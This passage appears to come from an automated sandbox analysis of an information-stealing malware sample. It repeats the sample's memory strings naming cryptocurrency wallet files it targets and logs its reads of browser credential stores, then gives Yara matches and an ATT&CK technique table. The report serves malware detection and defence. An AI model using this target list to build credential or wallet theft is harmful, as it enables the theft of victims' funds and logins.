Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.jsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                      Source: Yara matchFile source: Process Memory Space: kat2B07.tmp PID: 204, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.82xul16VKj.exe.3080000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.82xul16VKj.exe.2eb7719.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.82xul16VKj.exe.2eb7719.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.82xul16VKj.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.82xul16VKj.exe.2a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kat2B07.tmp PID: 204, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D745C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,2_2_1D745C70
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7B1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1D7B1FE0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7ADFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,2_2_1D7ADFC0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D85D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,2_2_1D85D9E0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7D5910 sqlite3_mprintf,sqlite3_bind_int64,2_2_1D7D5910
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7ADB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_1D7ADB10
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7D55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1D7D55B0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D8514D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,2_2_1D8514D0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D85D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,2_2_1D85D4F0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D80D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1D80D610
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7D51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1D7D51D0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7C9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,2_2_1D7C9090
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7ED3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1D7ED3B0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D814D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_1D814D40
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D768CB0 sqlite3_bind_zeroblob,2_2_1D768CB0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D760FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,2_2_1D760FB0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D768970 sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,2_2_1D768970
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D744820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,2_2_1D744820
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D788550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,2_2_1D788550
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D768430 sqlite3_bind_int64,2_2_1D768430
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7806E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,2_2_1D7806E0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D758680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,2_2_1D758680
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D814140 sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_initialize,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,2_2_1D814140
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7A8200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_1D7A8200
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D767810 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_1D767810
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D75B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,2_2_1D75B400
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7F3770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1D7F3770
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D8137E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1D8137E0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D78EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,2_2_1D78EF30
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7AA6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,2_2_1D7AA6F0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7466C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_1D7466C0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7AE170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1D7AE170
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D79E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_1D79E090
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D79E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_1D79E200
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      2
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      2
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Shared Modules
                      Boot or Logon Initialization Scripts511
                      Process Injection
                      2
                      Obfuscated Files or Information
                      LSASS Memory2
                      File and Directory Discovery
                      Remote Desktop Protocol4
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Command and Scripting Interpreter
                      Logon Script (Windows)Logon Script (Windows)1
                      Install Root Certificate
                      Security Account Manager34
                      System Information Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      DLL Side-Loading
                      NTDS1
                      Query Registry
                      Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Masquerading
                      LSA Secrets31
                      Security Software Discovery
                      SSHKeylogging114
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Modify Registry
                      Cached Domain Credentials1
                      Virtualization/Sandbox Evasion
